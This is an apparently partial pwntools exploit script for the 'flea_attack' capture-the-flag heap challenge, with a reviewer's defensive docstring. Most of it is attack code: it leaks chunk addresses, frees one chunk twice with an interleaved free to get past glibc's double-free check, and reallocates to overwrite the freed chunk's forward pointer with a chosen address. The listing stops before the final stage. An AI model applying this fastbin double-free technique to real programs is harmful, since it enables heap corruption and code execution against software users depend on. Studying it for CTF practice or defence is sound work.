#!/usr/bin/python
"""Menu-driving script for the "flea_attack" heap challenge (Python 2, pwntools).

What the listing shows the target doing: menu option "1" takes a size and
then contents and echoes the new chunk's address after "Addr: "; menu
option "2" frees whatever address the user types in.  The script allocates
three chunks, frees the first one twice with a free of the second one in
between, then allocates again until the first chunk is handed out twice.

Reviewer notes, defensive side:
- The weakness being exercised is an allocator front-end that frees a
  user-supplied address and leaks chunk addresses.  Keeping an ownership
  table and refusing to free anything not currently allocated (and clearing
  the slot on free) removes both halves of the problem.
- The interleaved free exists to get past the allocator's top-of-bin
  double-free check (the author's own message says so).  Newer glibc tcache
  records a per-chunk key on free and aborts on a repeat free, which is the
  detection this sequence is built to avoid on the older fastbin path.
- Every bare recv() below reads "whatever has arrived so far", so the
  script is timing-sensitive; recvuntil() on a known prompt is the robust
  form and is what most of the other steps use.
"""
 
import pwn
from pwn import *  # NOTE(review): redundant with `import pwn`; p8/p64 come from this star import
 
p = pwn.process("./flea_attack.elf")
# p = pwn.remote("problem.harekaze.com",20175)
raw_input("<ATTACH NOW>")  # pause so a debugger can be attached to the local process
p.recv()
# the size is 0x04.
# 95 bytes of 0x41 answered to the first prompt; the author notes the content is irrelevant.
p.sendline( ("A"*94 ) + p8(0x41)) # no-one cares
p.recvuntil(">")
p.sendline("1")  # menu option 1: allocate
p.recv()
p.sendline("50")  # requested size
buf = "AAAA"
p.sendline(buf)  # chunk contents
p.recvuntil("Addr: ")
basechunk = int(p.recvuntil("\n").rstrip(),16)  # address echoed by the program, hex
print " PUTTING IN NEW CHUNK OF 50 FOR DEBUG"
p.recvuntil(">")
p.sendline("1")
p.recv()
p.sendline("50")
p.sendline("lol")
p.recvuntil("Addr: ")
basechunk2 = int(p.recvuntil("\n").rstrip(),16)
print " ADDRESS OF CHUNK1 AT: %x" % basechunk
print " ADDRESS OF CHUNK2 AT: %x" % basechunk2
print "ALLOCATING ONE MORE FOR GOOD MEASURE..."
p.recvuntil(">")
p.sendline("1")
p.recv()
p.sendline("50")
p.sendline("lol")  # third chunk; its address is never read back
raw_input("<STOP1>")  # breakpoint for inspecting the heap before the frees
p.recvuntil(">")
print " FREEING ORIGINAL CHUNK at %x" % basechunk
p.sendline("2")  # menu option 2: free by user-supplied address
p.recv()
p.sendline("%x" % (basechunk))
p.recvuntil(">")
# Freeing a different chunk between the two frees of basechunk is what the
# author relies on to get past the allocator's top-of-bin double-free check.
print " FREEING SECOND CHUNK TO SKIP SECURITY CHECK at %x" % (basechunk2)
p.sendline("2")
p.recv()
p.sendline("%x" % (basechunk2))
p.recvuntil(">")
# p.interactive()
print " FREEING ORIGINAL CHUNK AGAIN at %x" % basechunk
p.sendline("2")
p.recv()
p.sendline("%x" % (basechunk))  # second free of the same chunk
p.recvuntil(">")
raw_input("<STOP2>")  # breakpoint for inspecting the bin state after the double free
print " SETUP: ALLOCATING FIRST CHUNK WITH NON-ZERO FD PTR"
p.sendline("1")  # no recvuntil(">") here: the prompt was already consumed above
p.sendline("50")
# 8-byte constant written at the start of the re-allocated chunk, i.e. where the
# allocator kept its forward pointer while the chunk was free.  Why the author
# chose 0x204056 is not shown in this listing.
buf = p64(0x204056)
p.sendline(buf)
p.recvuntil("Addr: ")
explsetup = int(p.recvuntil("\n").rstrip(),16)  # expected to be basechunk again (see prints below)
print " SETUP: ALLOCATING SECOND CHUNK (TO GET FIRST CHUNK BACK TO FREELIST HEAD)"
p.recvuntil(">")
p.sendline("1")
p.sendline("50")
p.sendline("bbbb")
p.recvuntil("Addr: ")
idgaf = int(p.recvuntil("\n").rstrip(),16)  # address is parsed but never used afterwards
print " OK, REALLOCATING OVER FIRST CHUNK'S FD..."
p.recvuntil(">")
p.sendline("1")
p.sendline("50")
p.sendline("cccc")
p.recvuntil("Addr: ")
explchunk = int(p.recvuntil("\n").rstrip(),16)
p.recvuntil(">")
# Both addresses are printed so the operator can confirm the same chunk was handed out twice.
print " FIRST CHUNK REALLOCATE #1: %x" % explsetup
print " FIRST CHUNK REALLOCATE #2: %x" % explchunk
 
# reallocate 50, then add in "A"'s...
# (author's note: the listing stops here; the remaining steps were never written)
 
p.interactive()  # hand the session over to the operator